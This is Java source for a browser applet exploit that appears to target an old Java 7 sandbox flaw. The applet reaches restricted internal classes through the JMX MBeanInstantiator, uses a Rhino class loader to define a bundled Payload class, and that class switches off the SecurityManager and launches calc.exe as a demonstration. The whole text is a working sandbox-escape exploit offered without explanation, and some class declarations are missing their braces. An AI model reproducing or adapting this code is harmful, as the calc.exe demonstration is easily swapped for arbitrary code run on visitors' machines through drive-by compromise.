import java.applet.Applet;

import com.sun.jmx.mbeanserver.Introspector;

import com.sun.jmx.mbeanserver.JmxMBeanServer;

import com.sun.jmx.mbeanserver.MBeanInstantiator;

import java.lang.invoke.MethodHandle;

import java.lang.invoke.MethodHandles.Lookup;

import java.lang.invoke.MethodType;

import java.lang.reflect.InvocationTargetException;

import java.lang.reflect.Method;

import javax.management.ReflectionException;

import java.io.*;

 

public class PaunchGift extends Applet

 

  public void init()

  {

   

    try

    {  

           int length;

           byte[] buffer = new byte[5000];

           ByteArrayOutputStream os = new ByteArrayOutputStream();

           

           // read in the class file from the jar

           InputStream is = getClass().getResourceAsStream("Payload.class");

           

           // and write it out to the byte array stream

           while( ( length = is.read( buffer ) ) > 0 )

               os.write( buffer, 0, length );

               

           // convert it to a simple byte array

           buffer = os.toByteArray();

           

          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");

         

          Method method = getMethod(class1, "enter", true);

          Object obj = method.invoke(null, new Object[0]);

          Method method1 = getMethod(class1, "createClassLoader", false);

          Object obj1 = method1.invoke(obj, new Object[1]);

   

          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");

          Method method2 = getMethod(class2, "defineClass", false);

         

          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });

          my_class.newInstance();

          Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);

          m_outSandbox.invoke(null, new Object[] {});

     

    }

    catch (Throwable localThrowable){}

   

  }

   

 

   private Method getMethod(Class class1, String s, boolean flag)

  {

    try {

      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");

      Method[] amethod1 = amethod;

     

      for (int i = 0; i < amethod1.length; i++) {

        Method method = amethod1[i];

        String s1 = method.getName();

        Class[] aclass = method.getParameterTypes();

        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;

      }

    } catch (Exception localException) {  }

 

    return null;

  }

 

  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException

  {

    Object obj = null;

    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);

    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();

       

    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");

    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });

    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });

  }

 

 

###############################################

import java.lang.reflect.Method;

import java.security.AccessController;

import java.security.PrivilegedExceptionAction;

 

public class Payload implements PrivilegedExceptionAction

   

    public Payload()

    {

        try

        {

            AccessController.doPrivileged(this);

        }

        catch(Exception exception) { }

    }

 

    public Object run() throws Exception

    {

        Class cl = System.class;

        Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });

        m.invoke(null, new Object[1]);

        return null;

    }

 

    public static void outSandbox() throws Exception

    {

        Runtime.getRuntime().exec("calc.exe");

    }